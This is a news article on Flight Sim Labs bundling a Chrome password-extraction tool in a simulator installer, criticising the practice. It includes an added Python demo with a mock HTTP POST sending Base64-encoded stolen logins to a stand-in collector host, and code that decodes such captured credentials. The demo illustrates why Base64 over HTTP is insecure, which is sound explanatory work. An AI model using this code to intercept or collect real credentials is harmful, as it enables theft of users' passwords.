Flight simulator comes bundled with password stealing stowaway

How far should a software company be able to go to protect its products from piracy?

Not, one would assume, as far as deploying a Chrome password capture tool in its downloads. Yet this was the extraordinary accusation levelled at Flight Sim Labs (FSLabs) last weekend by a perplexed Reddit user.

The company makes flight simulation mods, one of which – an Airbus A320X add-on for Lockheed Martin’s pro-level Prepar3D – was setting off antivirus software during installation.

As the user suspected – and as pen-testing company Fidus Information Security subsequently confirmed – the offending file, test.exe, was an executable for something called SecurityXploded. Explains Fidus:

The command line-based tool allows users to extract saved usernames and passwords from the Google Chrome browser and have them displayed in a readable format.

Under pressure, FSLabs quickly owned up to what it was doing and, moreover, why it was doing it.

According to founder and CEO, Lefteris Kalamaras, the tool captured passwords but not indiscriminately (FSLabs’ emphasis):

There are no tools used to reveal any sensitive information of any customer who has legitimately purchased our products.

The tool only activated if the user had installed the software using a pirated serial number believed to be circulating on the internet.

That program is only extracted temporarily and is never under any circumstances used in legitimate copies of the product.

It was so narrowly targeted, in fact, that the whole scheme was intended to gather evidence against a single individual believed to be circulating license keys for FSLabs’ software.

The company has since set out its side of events in more detail, which hasn’t stopped its behaviour going down badly.

With Reddit sentiment well into the red zone, the company then backtracked, uploading a new version of the installer with the offending test.exe removed.

Legitimate action to stop pirates ripping off software or digital rights management (DRM) overreach?

This is easily answered: installing a tool designed to capture user data without consent, however narrowly configured, is hard to justify, ethically or technically. The credential-dumping binary is shipped to every customer; only the installer’s serial-number check decides whether it runs.

Even setting aside the possibility that such a capability could be misused, Fidus found that the routine was designed to send the captured data over an unencrypted HTTP channel, encoded in nothing more secure than Base64. Base64 is an encoding, not encryption: anyone able to observe the traffic could decode the harvested passwords as easily as the intended recipient.
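To make that point concrete, here is an added example (not code from the article, from FSLabs or from Fidus) showing what a passive observer on the network path can do with a plaintext HTTP POST whose body is only Base64-encoded. The request text, the form field name `data`, the collector hostname and the `url|username|password` record layout are all constructed assumptions for this demo; the real upload format is not described on the page.

```python
"""Passive recovery of Base64-encoded credentials from a plaintext HTTP POST.

Added example, not code from the article, FSLabs or Fidus. It shows why
Base64 over unencrypted HTTP gives no confidentiality: anyone who captures
the request can decode the payload and read the credentials.
The request text, the 'data' form field and the 'url|user|password' record
layout are constructed assumptions for this demonstration.
"""
import base64
import binascii
from urllib.parse import parse_qs, quote

# Constructed sample: two Chrome-style saved logins, one per line, in an
# assumed 'url|username|password' layout (not the real tool's format).
_SAMPLE_RECORDS = (
    "https://mail.example.test|alice|hunter2\n"
    "https://bank.example.test|alice|S3cret!\n"
)
_SAMPLE_BODY = ("data=" + quote(base64.b64encode(_SAMPLE_RECORDS.encode()).decode(), safe="")).encode()

# Constructed plaintext HTTP request, as a network observer would capture it.
SAMPLE_REQUEST = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: collector.example.invalid\r\n"          # assumed hostname
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_SAMPLE_BODY)).encode() + b"\r\n"
    b"\r\n" + _SAMPLE_BODY + b"\r\n"
)


def split_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request line, header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker found")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def looks_like_base64(text: str) -> bool:
    """True if text is well-formed, padded Base64 of non-trivial length."""
    if len(text) < 8 or len(text) % 4 != 0:
        return False
    try:
        base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return False
    return True


def recover_credentials(raw: bytes, field: str = "data"):
    """Decode the Base64 form field of a captured POST into credential records.

    Returns a list of {'url', 'user', 'password'} dicts; an empty list if the
    request is not a form-encoded POST or carries no decodable payload.
    """
    request_line, headers, body = split_http_request(raw)
    if not request_line.startswith("POST "):
        return []
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return []
    form = parse_qs(body.decode("latin-1").strip())
    creds = []
    for blob in form.get(field, []):
        if not looks_like_base64(blob):
            continue
        plaintext = base64.b64decode(blob).decode("utf-8", errors="replace")
        for line in plaintext.splitlines():
            parts = line.split("|")
            if len(parts) != 3:      # skip lines not matching the assumed layout
                continue
            url, user, password = parts
            creds.append({"url": url, "user": user, "password": password})
    return creds


if __name__ == "__main__":
    for record in recover_credentials(SAMPLE_REQUEST):
        print(f"{record['url']}: {record['user']} / {record['password']}")
```

The observer needs no key, no malware analysis and no access to either endpoint: a packet capture of the upload is enough. Had the tool used TLS the on-path observer would see only ciphertext, though that would not have changed the ethical problem of shipping a credential dumper in an installer.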

The company appears to have been using the tool for months, having reportedly advised users in a forum post to turn off their antivirus if test.exe set it off. This was, and is, bad advice that unnecessarily exposes customers to risk: disabling endpoint protection to get past a detection removes the one control that flagged the problem in the first place.

Undocumented DRM has a history of leading to trouble when customers find out about it – just ask Sony BMG, hauled over the coals in 2005 for using CD protection that behaved like a rootkit.

As with Sony before it, FSLabs should have asked itself how it would look if its users ever found it, what legal and regulatory bodies might do if they found it, and what use criminals might make of it if they found it.